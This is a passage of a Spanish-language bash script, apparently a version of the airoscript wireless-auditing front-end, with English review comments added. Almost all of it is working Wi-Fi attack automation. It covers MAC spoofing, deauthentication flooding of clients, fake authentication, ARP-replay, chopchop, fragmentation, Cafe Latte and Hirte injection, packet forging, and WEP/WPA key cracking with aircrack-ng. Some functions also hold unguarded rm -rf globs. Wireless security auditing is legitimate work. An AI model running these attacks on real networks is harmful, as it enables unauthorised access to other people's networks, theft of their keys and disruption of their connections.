    printf '%s' " #> "
    read yn
    case "$yn" in
      1) randommacchanger; break ;;
      2) clientmacchanger; break ;;
      3) inputmacchanger; break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Give the interface a random MAC, refresh the cached address, redraw the menu.
# Globals: WIFI (read)
# Calls:   detectarmac, menu
randommacchanger() {
  # The interface is taken down while macchanger runs and brought back up
  # afterwards.
  ifconfig $WIFI down
  macchanger -r $WIFI
  sleep 2
  ifconfig $WIFI up
  detectarmac
  clear
  menu
}
# Set the interface MAC to the selected client's address, refresh the cached
# address, redraw the menu.
# Globals: WIFI, Client_MAC (read)
# Calls:   detectarmac, menu
clientmacchanger() {
  ifconfig $WIFI down
  macchanger -m $Client_MAC $WIFI
  sleep 2
  ifconfig $WIFI up
  detectarmac
  clear
  menu
}
# Prompt for a MAC address and apply it to the interface.
# Globals: WIFI (read); MANUAL_MAC (written; used as typed, no format check)
# Calls:   detectarmac, menu
inputmacchanger() {
  printf '%s' "Teclea la nueva MAC: "
  read MANUAL_MAC
  printf '\n'
  echo Su Nueva MAC es: $MANUAL_MAC
  printf '\n'
  ifconfig $WIFI down
  macchanger -m $MANUAL_MAC $WIFI
  sleep 2
  ifconfig $WIFI up
  detectarmac
  clear
  menu
}
# Pick the non-interactive key-recovery helper for the target's encryption.
# Globals: Host_ENC (read)
# Calls:   configure (WEP), wpaconfigure (everything else)
witchconfigure() {
  # Unquoted on purpose, see the other Host_ENC tests: splitting strips
  # padding and an empty value falls through to the else branch.
  if [ $Host_ENC = "WEP" ]; then
    configure
  else
    wpaconfigure
  fi
}
# Open an xterm running aircrack-ng with -z on the target's capture, then
# redraw the main menu.
# Globals: Host_SSID, Host_MAC, FUDGEFACTOR, DUMP_PATH, KEYS, TOPRIGHTBIG (read)
# Calls:   menu
# NOTE(review): Host_SSID comes from the scan results or from the operator
# and is used verbatim as a file name under $KEYS; a network name containing
# "/" would make -l write outside that folder. Sanitising the name before it
# is used in a path would close that off.
crackptw() {
  xterm -hold -title "Aircrack PTW contra $Host_SSID" $TOPRIGHTBIG \
    -e aircrack-ng -z -b $Host_MAC -f $FUDGEFACTOR -0 \
    -s $DUMP_PATH/$Host_MAC-01.cap -l "$KEYS/$Host_SSID.txt" &
  menu
}
# Open an xterm running aircrack-ng with -a 1 on the target's capture, then
# redraw the main menu.
# Globals: Host_SSID, Host_MAC, FUDGEFACTOR, DUMP_PATH, KEYS, TOPRIGHTBIG (read)
# Calls:   menu
# NOTE(review): Host_SSID is used verbatim in the -l output path; see that a
# "/" in the network name cannot leave $KEYS.
crackstd() {
  xterm -hold -title "Aircrack contra $Host_SSID" $TOPRIGHTBIG \
    -e aircrack-ng -a 1 -b $Host_MAC -f $FUDGEFACTOR -0 \
    -s $DUMP_PATH/$Host_MAC-01.cap -l "$KEYS/$Host_SSID.txt" &
  menu
}
# Ask for a fudge factor and key size, then open an xterm running aircrack-ng
# with those values and redraw the main menu.
# Globals: FUDGE_FACTOR, ENC_SIZE (written); Host_SSID, Host_MAC, DUMP_PATH,
#          KEYS, TOPRIGHTBIG (read)
# Calls:   menu
# NOTE(review): neither answer is checked to be numeric before it is placed
# on the command line.
crackman() {
  printf '%s' "tipo de fudge factor"
  read FUDGE_FACTOR
  echo You typed: $FUDGE_FACTOR
  # The two `set --` calls only reset this function's positional parameters.
  set -- ${FUDGE_FACTOR}
  printf '%s' "tamaño de clave en bits? 64,128 etc... >"
  read ENC_SIZE
  echo You typed: $ENC_SIZE
  set -- ${ENC_SIZE}
  xterm -hold -title "Manual cracking: $Host_SSID" $TOPRIGHTBIG \
    -e aircrack-ng -a 1 -b $Host_MAC -f $FUDGE_FACTOR -n $ENC_SIZE -0 \
    -s $DUMP_PATH/$Host_MAC-01.cap -l "$KEYS/$Host_SSID.txt" &
  menu
}
# Menu of the three aircrack-ng variants offered for WEP.
# Calls: crackptw, crackstd, crackman
crack() {
  while :; do
    clear
    printf '%s\n' \
      " " \
      " Opciones WEP CRACKING " \
      " " \
      " 1) aircrack-ng PTW " \
      " 2) aircrack-ng Estandard " \
      " 3) aircrack-ng Opciones User " \
      " "
    printf '%s' " #> "
    read yn
    case "$yn" in
      1) crackptw; break ;;
      2) crackstd; break ;;
      3) crackman; break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Remove the target's old capture files, open a capture window on the
# target's channel and, two seconds later, a deauth window for the selected
# client.
# Globals: DUMP_PATH, Host_MAC, Host_SSID, Host_CHAN, Client_MAC, WIFI, HOLD,
#          TOPLEFTBIG, TOPRIGHT (read)
wpahandshake() {
  clear
  # NOTE(review): with an empty Host_MAC this glob becomes $DUMP_PATH/* and
  # removes every file in the capture folder.
  rm -rf $DUMP_PATH/$Host_MAC*
  xterm $HOLD -title "Esperando Handshake de $Host_SSID" $TOPLEFTBIG \
    -bg "#000000" -fg "#FFFFFF" \
    -e airodump-ng --channel $Host_CHAN --bssid $Host_MAC -w $DUMP_PATH/$Host_MAC $WIFI &
  sleep 2
  xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" \
    -title "Desautenticando $Client_MAC de $Host_SSID" \
    -e aireplay-ng --deauth 10 -a $Host_MAC -c $Client_MAC $WIFI &
  clear
}
# Ask for a dictionary path and open an xterm running aircrack-ng (WPA mode)
# with it.
# Globals: WORDLISTMANUAL (written); Host_SSID, Host_MAC, DUMP_PATH, KEYS,
#          TOPRIGHT (read)
# NOTE(review): the typed path is expanded unquoted, so a path containing
# spaces is split into several arguments.
wpacrack() {
  printf '%s' "Teclee la ruta del diccionario que desea usar: "
  read WORDLISTMANUAL
  xterm -hold $TOPRIGHT -title "Aircracking: $Host_SSID" \
    -e aircrack-ng -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap \
    -w $WORDLISTMANUAL -l "$KEYS/$Host_SSID.txt" &
}
# aircrack command -w
# Open an xterm running aircrack-ng with the temporary wordlist against every
# .cap file in the capture folder.
# Globals: WORDLIST_PATH, Host_SSID, Host_MAC, FUDGEFACTOR, DUMP_PATH, KEYS,
#          HOLD, TOPRIGHT (read)
wlcrack() {
  # $DUMP_PATH/*.cap is expanded by the shell before xterm starts.
  xterm $HOLD $TOPRIGHT -title "Aircracking: $Host_SSID" -hold \
    -e aircrack-ng -K -w "$WORDLIST_PATH" -b $Host_MAC -f $FUDGEFACTOR -0 \
    -s $DUMP_PATH/*.cap -l "$KEYS/$Host_SSID.txt" &
}
# Delete the previous scan files and run airodump-ng on all channels.
# Globals: DUMP_PATH, ENCRYPT, WIFI, HOLD, TOPLEFTBIG (read)
Scan() {
  clear
  rm -rf $DUMP_PATH/dump*
  # Not backgrounded: the script waits until the scan window is closed.
  xterm $HOLD -title "Escaneando Objetivos ..." $TOPLEFTBIG \
    -bg "#000000" -fg "#FFFFFF" \
    -e airodump-ng -w $DUMP_PATH/dump --encrypt $ENCRYPT -a $WIFI
}
# Ask for a channel specification, delete the previous scan files and run
# airodump-ng restricted to those channels.
# Globals: channel_number (written); DUMP_PATH, ENCRYPT, WIFI, HOLD,
#          TOPLEFTBIG (read)
Scanchan() {
  clear
  printf '%s\n' \
    " " \
    " Selecciona Canal de busqueda " \
    " " \
    " Un solo canal 6 " \
    " rango de canales 1-5 " \
    " Multiples canales 1,2,5-7,11 " \
    " "
  printf '%s' " #> "
  read channel_number
  echo You typed: $channel_number
  # Only resets this function's own positional parameters.
  set -- ${channel_number}
  clear
  rm -rf $DUMP_PATH/dump*
  # Not backgrounded: the script waits until the scan window is closed.
  xterm $HOLD -title "Escaneando Objetivos en el canal --> $channel_number" $TOPLEFTBIG \
    -bg "#000000" -fg "#FFFFFF" \
    -e airodump-ng -w $DUMP_PATH/dump --channel "$channel_number" --encrypt $ENCRYPT -a $WIFI
}
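# Remove the target's previous capture files and run airodump-ng locked to
# the target's BSSID and channel.
# Globals: DUMP_PATH, Host_MAC, Host_CHAN, WIFI, HOLD, TOPLEFT (read)
# Returns: 1 without touching any file when DUMP_PATH or Host_MAC is empty
capture() {
  clear
  # With an empty Host_MAC the cleanup glob would be "$DUMP_PATH/*" and wipe
  # the whole capture folder (including the scan CSV); with an empty
  # DUMP_PATH it would start at "/". Refuse both instead of deleting.
  if [[ -z "$DUMP_PATH" || -z "$Host_MAC" ]]; then
    echo "capture: DUMP_PATH or Host_MAC is empty, nothing done" >&2
    return 1
  fi
  rm -rf -- "$DUMP_PATH/$Host_MAC"*
  # Not backgrounded here; callers that need it in parallel append "&".
  xterm $HOLD -title "Capturando datos en el canal --> $Host_CHAN" $TOPLEFT \
    -bg "#000000" -fg "#FFFFFF" \
    -e airodump-ng --bssid $Host_MAC -w $DUMP_PATH/$Host_MAC -c $Host_CHAN -a $WIFI
}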
# Open a background xterm running aireplay-ng --deauth against the target AP
# with no client address given.
# Globals: HOLD, TOPRIGHT, Host_SSID, DEAUTHTIME, Host_MAC, WIFI (read)
deauthall() {
  xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" \
    -title "Desautenticando a todos de $Host_SSID" \
    -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC $WIFI &
}
# Open a background xterm running aireplay-ng --deauth for the selected
# client of the target AP.
# Globals: HOLD, TOPRIGHT, Host_SSID, DEAUTHTIME, Host_MAC, Client_MAC,
#          WIFI (read)
deauthclient() {
  xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" \
    -title "Desautenticando $Client_MAC de $Host_SSID" \
    -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI &
}
# Open a background xterm running aireplay-ng --deauth for the interface's
# own address (FAKE_MAC).
# Globals: HOLD, TOPRIGHT, Host_SSID, DEAUTHTIME, Host_MAC, FAKE_MAC,
#          WIFI (read)
deauthfake() {
  xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" \
    -title "Desautenticando $FAKE_MAC de $Host_SSID" \
    -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC -c $FAKE_MAC $WIFI &
}
# Open a background xterm running aireplay-ng --fakeauth with the fixed
# values 6000 / -o 1 / -q 10 against the target AP.
# Globals: HOLD, BOTTOMRIGHT, Host_SSID, Host_MAC, FAKE_MAC, WIFI (read)
fakeauth3() {
  xterm $HOLD -title "Asociando Con $Host_SSID " $BOTTOMRIGHT \
    -bg "#000000" -fg "#FF0009" \
    -e aireplay-ng --fakeauth 6000 -o 1 -q 10 -e "$Host_SSID" -a $Host_MAC -h $FAKE_MAC $WIFI &
}
# Tune to the target's channel, start a capture alongside deauthall, then ask
# whether a client showed up and list the clients if so.
# Globals: WIFI, Host_CHAN (read)
# Calls:   capture (in the background), deauthall, listclients
clientdetectandchoose() {
  iwconfig $WIFI channel $Host_CHAN
  capture &
  deauthall
  while :; do
    clear
    printf '%s\n' \
      "¿SE ENCONTRÓ EL CLIENTE?" \
      " " \
      " 1) Si" \
      " 2) No" \
      " "
    printf '%s' ' #> '
    read yn
    case "$yn" in
      1) listclients fromclientdetection; break ;;
      2) break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Start three background jobs: the capture window, an aireplay-ng --arpreplay
# window using FAKE_MAC as source, and fakeauth3.
# Globals: HOLD, BOTTOMLEFT, Host_MAC, FAKE_MAC, INJECTRATE, WIFI (read)
# Calls:   capture, fakeauth3
attack() {
  capture &
  xterm $HOLD -title "Inyeccion: Host: $Host_MAC" $BOTTOMLEFT \
    -bg "#000000" -fg "#1DFF00" \
    -e aireplay-ng "$WIFI" --arpreplay -b $Host_MAC -d FF:FF:FF:FF:FF:FF \
    -f 1 -m 68 -n 86 -h $FAKE_MAC -x $INJECTRATE &
  fakeauth3 &
  sleep 2
  clear
}
# Start the capture window and an aireplay-ng --arpreplay window that uses
# the selected client's MAC as source, both in the background.
# Globals: HOLD, BOTTOMLEFT, Host_MAC, Client_MAC, INJECTRATE, WIFI (read)
# Calls:   capture
attackclient() {
  capture &
  xterm $HOLD -title "Inyeccion: Host: $Host_MAC CLient: $Client_MAC" $BOTTOMLEFT \
    -bg "#000000" -fg "#1DFF00" \
    -e aireplay-ng $WIFI --arpreplay -b $Host_MAC -d FF:FF:FF:FF:FF:FF \
    -f 1 -m 68 -n 86 -h $Client_MAC -x $INJECTRATE &
  sleep 2
  clear
}
# Start the capture window and an aireplay-ng --interactive window, both in
# the background.
# Globals: HOLD, BOTTOMLEFT, Host_SSID, Host_MAC, Client_MAC, INJECTRATE,
#          WIFI (read)
# Calls:   capture
# NOTE(review): $Client_MAC follows "-b $Host_MAC" with no option letter in
# front of it, unlike the -h used in fakeinteractiveattack - confirm intent.
interactiveattack() {
  capture &
  xterm $HOLD -title "Selección Packet interactiva en Host: $Host_SSID" $BOTTOMLEFT \
    -bg "#000000" -fg "#1DFF00" \
    -e aireplay-ng $WIFI --interactive -p 0841 -c FF:FF:FF:FF:FF:FF \
    -b $Host_MAC $Client_MAC -x $INJECTRATE &
  sleep 2
  clear
}
# Start three background jobs: the capture window, an aireplay-ng
# --interactive window using FAKE_MAC as source, and fakeauth3.
# Globals: HOLD, BOTTOMLEFT, Host_SSID, Host_MAC, FAKE_MAC, INJECTRATE,
#          WIFI (read)
# Calls:   capture, fakeauth3
fakeinteractiveattack() {
  capture &
  xterm $HOLD -title "Selección Packet interactiva en Host: $Host_SSID" $BOTTOMLEFT \
    -bg "#000000" -fg "#1DFF00" \
    -e aireplay-ng $WIFI --interactive -p 0841 -c FF:FF:FF:FF:FF:FF \
    -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE &
  fakeauth3 &
  sleep 2
  clear
}
# Start three background jobs: the capture window, an aireplay-ng -6 window
# and fakeauth3.
# Globals: HOLD, BOTTOMLEFT, Host_SSID, Host_MAC, FAKE_MAC, INJECTRATE,
#          WIFI (read)
# Calls:   capture, fakeauth3
cafelatteattack() {
  capture &
  xterm $HOLD -title "Ataque Cafe Latte en: $Host_SSID" $BOTTOMLEFT \
    -bg "#000000" -fg "#1DFF00" \
    -e aireplay-ng -6 -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE -D $WIFI &
  fakeauth3 &
  sleep 2
  clear
}
# Start three background jobs: the capture window, an aireplay-ng -7 window
# and fakeauth3.
# Globals: HOLD, BOTTOMLEFT, Host_SSID, Host_MAC, FAKE_MAC, INJECTRATE,
#          WIFI (read)
# Calls:   capture, fakeauth3
hirteattack() {
  capture &
  xterm $HOLD -title "Ataque Hirte en: $Host_SSID" $BOTTOMLEFT \
    -bg "#000000" -fg "#1DFF00" \
    -e aireplay-ng -7 -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE -D $WIFI &
  fakeauth3 &
  sleep 2
  clear
}
# Clear old capture/xor files, start capture, fakeauth3 and an aireplay-ng
# --chopchop window in the background, then show the injection menu.
# Globals: DUMP_PATH, Host_MAC, Host_SSID, FAKE_MAC, WIFI, BOTTOMLEFT (read)
# Calls:   capture, fakeauth3, injectmenu
chopchopattack() {
  clear
  # NOTE(review): with an empty Host_MAC this glob becomes $DUMP_PATH/* and
  # removes every file in the capture folder.
  rm -rf $DUMP_PATH/$Host_MAC*
  # Relative pattern: removes xor files from the current working directory.
  rm -rf replay_dec-*.xor
  capture &
  fakeauth3 &
  xterm -hold -title "Ataque ChopChop a $Host_SSID" $BOTTOMLEFT \
    -bg "#000000" -fg "#99CCFF" \
    -e aireplay-ng --chopchop -b $Host_MAC -h $FAKE_MAC $WIFI &
  sleep 2
  clear
  injectmenu
}
# Clear old capture/xor files, start capture and an aireplay-ng --chopchop
# window that uses the selected client's MAC, then show the injection menu.
# Globals: DUMP_PATH, Host_MAC, Host_SSID, Client_MAC, WIFI, BOTTOMLEFT (read)
# Calls:   capture, injectmenu
chopchopattackclient() {
  clear
  # NOTE(review): with an empty Host_MAC this glob becomes $DUMP_PATH/* and
  # removes every file in the capture folder.
  rm -rf $DUMP_PATH/$Host_MAC*
  # Relative pattern: removes xor files from the current working directory.
  rm -rf replay_dec-*.xor
  capture &
  xterm -hold -title "Ataque ChopChop a $Host_SSID" $BOTTOMLEFT \
    -bg "#000000" -fg "#99CCFF" \
    -e aireplay-ng --chopchop -h $Client_MAC $WIFI &
  sleep 2
  clear
  injectmenu
}
# Build an ARP packet from the xor file(s) in the working directory with
# packetforge-ng and open an aireplay-ng --interactive window that replays
# it, using FAKE_MAC as source.
# Globals: DUMP_PATH, Host_MAC, FAKE_MAC, Client_IP, Host_IP, Host_SSID,
#          INJECTRATE, WIFI, HOLD, BOTTOMLEFT (read)
chopchopend() {
  rm -rf $DUMP_PATH/chopchop_$Host_MAC*
  # "*.xor" is expanded by the shell in the current working directory; more
  # than one match puts extra file names on the command line.
  packetforge-ng -0 -a $Host_MAC -h $FAKE_MAC -k $Client_IP -l $Host_IP \
    -w $DUMP_PATH/chopchop_$Host_MAC.cap -y *.xor
  xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" \
    -title "Enviando chopchop a $Host_SSID" \
    -e aireplay-ng --interactive -r $DUMP_PATH/chopchop_$Host_MAC.cap \
    -h $FAKE_MAC -x $INJECTRATE $WIFI &
  sleep 2
  clear
}
# Same as chopchopend, but with the selected client's MAC as source address.
# Globals: DUMP_PATH, Host_MAC, Client_MAC, Client_IP, Host_IP, Host_SSID,
#          INJECTRATE, WIFI, HOLD, BOTTOMLEFT (read)
chopchopclientend() {
  rm -rf $DUMP_PATH/chopchop_$Host_MAC*
  # "*.xor" is expanded by the shell in the current working directory.
  packetforge-ng -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP \
    -w $DUMP_PATH/chopchop_$Host_MAC.cap -y *.xor
  xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" \
    -title "Enviando chopchop a $Host_SSID" \
    -e aireplay-ng --interactive -r $DUMP_PATH/chopchop_$Host_MAC.cap \
    -h $Client_MAC -x $INJECTRATE $WIFI &
  sleep 2
  clear
}
# Clear old files, stop running airodump-ng/aireplay-ng, then start an
# aireplay-ng -5 window, the capture and fakeauth3 in the background and show
# the injection menu.
# Globals: DUMP_PATH, Host_MAC, Host_SSID, FAKE_MAC, FRAG_CLIENT_IP,
#          FRAG_HOST_IP, WIFI, BOTTOMLEFT (read)
# Calls:   capture, fakeauth3, injectmenu
fragnoclient() {
  # Relative pattern: removes xor files from the current working directory.
  rm -rf fragment-*.xor
  rm -rf $DUMP_PATH/frag_*.cap
  # NOTE(review): with an empty Host_MAC this glob becomes $DUMP_PATH/*.
  rm -rf $DUMP_PATH/$Host_MAC*
  killall -9 airodump-ng aireplay-ng
  xterm -hold $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" \
    -title "Ataque de Fragmentacion en: $Host_SSID" \
    -e aireplay-ng -5 -b $Host_MAC -h $FAKE_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $WIFI &
  capture &
  fakeauth3 &
  sleep 2
  clear
  injectmenu
}
# Build an ARP packet from the fragment xor file with packetforge-ng and open
# an aireplay-ng -2 window that replays it, using FAKE_MAC as source.
# Globals: DUMP_PATH, Host_MAC, FAKE_MAC, Client_IP, Host_IP, Host_SSID,
#          INJECTRATE, WIFI, HOLD, BOTTOMLEFT (read)
fragnoclientend() {
  # "fragment-*.xor" is expanded in the current working directory.
  packetforge-ng -0 -a $Host_MAC -h $FAKE_MAC -k $Client_IP -l $Host_IP \
    -y fragment-*.xor -w $DUMP_PATH/frag_$Host_MAC.cap
  xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" \
    -title "Inyectando packet forjado en $Host_SSID" \
    -e aireplay-ng -2 -r $DUMP_PATH/frag_$Host_MAC.cap \
    -h $FAKE_MAC -x $INJECTRATE $WIFI &
  sleep 2
  clear
}
# Clear old files, stop running airodump-ng/aireplay-ng, then start an
# aireplay-ng -5 window (selected client's MAC as source) and the capture in
# the background and show the injection menu.
# Globals: DUMP_PATH, Host_MAC, Host_SSID, Client_MAC, FRAG_CLIENT_IP,
#          FRAG_HOST_IP, WIFI, HOLD, BOTTOMLEFT (read)
# Calls:   capture, injectmenu
fragmentationattack() {
  # Relative pattern: removes xor files from the current working directory.
  rm -rf fragment-*.xor
  rm -rf $DUMP_PATH/frag_*.cap
  # NOTE(review): with an empty Host_MAC this glob becomes $DUMP_PATH/*.
  rm -rf $DUMP_PATH/$Host_MAC*
  killall -9 airodump-ng aireplay-ng
  xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" \
    -title "Ataque de Fragmentacion en: $Host_SSID" \
    -e aireplay-ng -5 -b $Host_MAC -h $Client_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $WIFI &
  capture &
  sleep 2
  clear
  injectmenu
}
# Clear old files, stop running airodump-ng/aireplay-ng, then start an
# aireplay-ng -7 window (selected client's MAC as source) and the capture in
# the background and show the injection menu.
# Globals: DUMP_PATH, Host_MAC, Host_SSID, Client_MAC, FRAG_CLIENT_IP,
#          FRAG_HOST_IP, WIFI, HOLD, BOTTOMLEFT (read)
# Calls:   capture, injectmenu
# NOTE(review): the window title is the same as in fragmentationattack, but
# the aireplay-ng mode flag here is -7 (the one hirteattack uses), not -5 -
# confirm which is intended.
fragmentationattackclient() {
  # Relative pattern: removes xor files from the current working directory.
  rm -rf fragment-*.xor
  rm -rf $DUMP_PATH/frag_*.cap
  # NOTE(review): with an empty Host_MAC this glob becomes $DUMP_PATH/*.
  rm -rf $DUMP_PATH/$Host_MAC*
  killall -9 airodump-ng aireplay-ng
  xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" \
    -title "Ataque de Fragmentacion en: $Host_SSID" \
    -e aireplay-ng -7 -b $Host_MAC -h $Client_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $WIFI &
  capture &
  sleep 2
  clear
  injectmenu
}
# Build an ARP packet from the fragment xor file with packetforge-ng and open
# an aireplay-ng -2 window that replays it, using the selected client's MAC
# as source.
# Globals: DUMP_PATH, Host_MAC, Client_MAC, Client_IP, Host_IP, Host_SSID,
#          INJECTRATE, WIFI, HOLD, BOTTOMLEFT (read)
fragmentationattackend() {
  # "fragment-*.xor" is expanded in the current working directory.
  packetforge-ng -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP \
    -y fragment-*.xor -w $DUMP_PATH/frag_$Host_MAC.cap
  xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" \
    -title "Inyectando packet forjado en $Host_SSID" \
    -e aireplay-ng -2 -r $DUMP_PATH/frag_$Host_MAC.cap \
    -h $Client_MAC -x $INJECTRATE $WIFI &
  sleep 2
  clear
}
# Build an ARP packet from the xor file(s) in the capture folder and open an
# aireplay-ng --interactive window that replays it, alongside a capture.
# Globals: ARP_PATH, DUMP_PATH, Host_MAC, Client_MAC, Client_IP, Host_IP,
#          Host_SSID, INJECTRATE, WIFI, HOLD, BOTTOMLEFT (read)
# Calls:   capture
pskarp() {
  # It used to delete the whole directory; now only the one file that could
  # get in the way is removed.
  rm -rf $ARP_PATH/arp_$Host_MAC.cap
  packetforge-ng -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP \
    -y $DUMP_PATH/dump*.xor -w $ARP_PATH/arp_$Host_MAC.cap
  capture &
  xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" \
    -title "Enviando ARP forjado a $Host_SSID" \
    -e aireplay-ng --interactive -r $ARP_PATH/arp_$Host_MAC.cap \
    -h $Client_MAC -x $INJECTRATE $WIFI &
  sleep 2
  clear
}
# Follow-up menu shown after a fragmentation/chopchop step: pick the matching
# injection step or go back.
# Calls: fragnoclientend, fragmentationattackend, chopchopend,
#        chopchopclientend
injectmenu() {
  clear
  while :; do
    # Two-second pause before every redraw, including after a wrong answer.
    sleep 2
    clear
    printf '%s\n' \
      " " \
      " Si el paso anterior dió resultado," \
      " selecciona. Si no, pulsa 5 " \
      " " \
      " 1) Frag inyeccion " \
      " 2) Frag con cliente inyeccion " \
      " 3) Chochop inyeccion " \
      " 4) Chopchop Con client inyec. " \
      " 5) Volver al menu Principal " \
      " "
    printf '%s' " #> "
    read yn
    printf '\n'
    case "$yn" in
      1) fragnoclientend; break ;;
      2) fragmentationattackend; break ;;
      3) chopchopend; break ;;
      4) chopchopclientend; break ;;
      5) break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
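# Advanced options menu; dispatches to the helper behind the chosen entry.
# Globals: KEYS, Host_SSID, WIFI2 (read); KEY2, WIFI3 (written)
# Calls:   setinterface, cleanup, SetAdvancedESSIDFilter, wichchangemac,
#          changerrate, ppsinput, desauinput, inject_test, airmoncheck,
#          choosemdk, cleanupdel, cleanupdel1, directorio, openxterm,
#          openscript, openscript1, conectmenu
# NOTE(review): Host_SSID comes from scan results or operator input and is
# used verbatim in the key file path; a name containing "/" would read a file
# outside $KEYS.
optionmenu() {
  local key_file="$KEYS/$Host_SSID.txt"
  # Load a previously saved key if there is one; a missing file leaves KEY2
  # empty without printing a cat error on every visit to this menu.
  KEY2=""
  if [[ -f "$key_file" && -r "$key_file" ]]; then
    KEY2=$(< "$key_file")
  fi
  WIFI3=$WIFI2
  while true; do
    clear
    # Entry 8 is printed as a normal one-line item; in the pasted listing its
    # number was missing and the string spanned three lines, although the
    # case arm for 8 exists below.
    printf '%s\n' \
      " " \
      " Selecciona una opcion " \
      " " \
      " 1) Selecciona otro interface " \
      " 2) Reset interface actual " \
      " 3) Filtro pantalla por ESSID " \
      " 4) Cambiar MAC " \
      " 5) Cambiar RATE " \
      " 6) Cambiar PPS " \
      " 7) Cambiar tiempo desauten... " \
      " 8) Test inyeccion " \
      " 9) Chequear con airmon-ng " \
      " 10) Mdk3 " \
      " 11) Eliminar archivos " \
      " 12) Eliminar diccionarios " \
      " 13) Explorar directorio de Salida " \
      " 14) Abrir un terminal " \
      " 15) Reiniciar Airoscript " \
      " 16) Abrir otro Airoscript " \
      " 17) Conectar con objetivo " \
      " 18) Volver al menu Principal " \
      " "
    printf '%s' " #> "
    read -r yn
    echo ""
    case "$yn" in
      1) setinterface; break ;;
      2) cleanup; break ;;
      3) SetAdvancedESSIDFilter; break ;;
      4) wichchangemac; break ;;
      5) changerrate; break ;;
      6) ppsinput; break ;;
      7) desauinput; break ;;
      8) inject_test; break ;;
      9) airmoncheck; break ;;
      10) choosemdk; break ;;
      11) cleanupdel; break ;;
      12) cleanupdel1; break ;;
      13) directorio; break ;;
      14) openxterm; break ;;
      15) openscript; break ;;
      16) openscript1; break ;;
      17) conectmenu; break ;;
      18) break ;;
      *) echo "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}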
# Stop monitor mode on the active interface and leave the script.
# Globals: WIFI (read)
exitmenu() {
  clear
  airmon-ng stop $WIFI
  # Plain `exit`: the script ends with the status of the airmon-ng call above.
  exit
}
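# Audit menu; dispatches to the key-recovery helper behind the chosen entry.
# Calls: witchcrack, wlgen_wlandecrypter, wlgen_dlinkdecrypter, wlgen_stkeys,
#        wlgen_jazzteldecrypter, wlgen_wlan4xx, wlgen_ono4xx,
#        wlgen_wpamagickey
crackmenu() {
  while true; do
    clear
    # Entry 8 is printed as a normal one-line item; in the pasted listing its
    # number was missing and the string spanned three lines, although the
    # case arm for 8 exists below.
    printf '%s\n' \
      " " \
      " Menu Auditar " \
      " " \
      " 1) Aircrack (WEP/WPA) " \
      " 2) Wlandecripter (WEP) " \
      " 3) Dlinkdecripter (WEP) " \
      " 4) Stkeys (WEP) " \
      " 5) Jazzteldecrypter (WEP) " \
      " 6) Wlan4xx (WEP/WPA) " \
      " 7) Ono4xx (WEP/WPA) " \
      " 8) WPAmagickey (WPA) " \
      " 9) Volver al menu Principal " \
      " "
    printf '%s' " #> "
    read -r yn
    case "$yn" in
      1) witchcrack; break ;;
      2) wlgen_wlandecrypter; break ;;
      3) wlgen_dlinkdecrypter; break ;;
      4) wlgen_stkeys; break ;;
      5) wlgen_jazzteldecrypter; break ;;
      6) wlgen_wlan4xx; break ;;
      7) wlgen_ono4xx; break ;;
      8) wlgen_wpamagickey; break ;;
      9) break ;;
      *) echo "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}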
# Prompt for a new packets-per-second value and store it.
# Globals: ppsmanual, INJECTRATE (written)
# Calls:   optionmenu
# NOTE(review): the answer is stored as typed; nothing checks that it is a
# number before it is later passed after -x.
ppsinput() {
  printf '%s' "Teclee la nueva cantidad de PPS (Paquetes Por Segundo, ej: 300): "
  read ppsmanual
  printf '\n'
  echo PPS Cambiado a: $ppsmanual PPS
  INJECTRATE=$ppsmanual
  sleep 2
  clear
  optionmenu
}
# Prompt for a new deauthentication value and store it.
# Globals: desaumanual, DEAUTHTIME (written)
# Calls:   optionmenu
# NOTE(review): the answer is stored as typed, without a numeric check.
desauinput() {
  printf '%s' "Teclee el nuevo tiempo de desautenticación (En Segundos, 0 = Sin Limite): "
  read desaumanual
  echo Tiempo de desautenticación cambiado a: $desaumanual Segundos
  DEAUTHTIME=$desaumanual
  sleep 2
  clear
  optionmenu
}
# Menu for connecting to the selected network.
# Calls: interselect, keyin, conect, desconect
conectmenu() {
  while :; do
    clear
    printf '%s\n' \
      " " \
      " Conectar a red seleccionada " \
      " " \
      " 1) Seleccionar interface " \
      " 2) Ingresar Key " \
      " 3) Conectar " \
      " 4) Desconectar " \
      " 5) Volver al menu Principal " \
      " "
    printf '%s' " #> "
    read yn
    case "$yn" in
      1) interselect; break ;;
      2) keyin; break ;;
      3) conect; break ;;
      4) desconect; break ;;
      5) break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
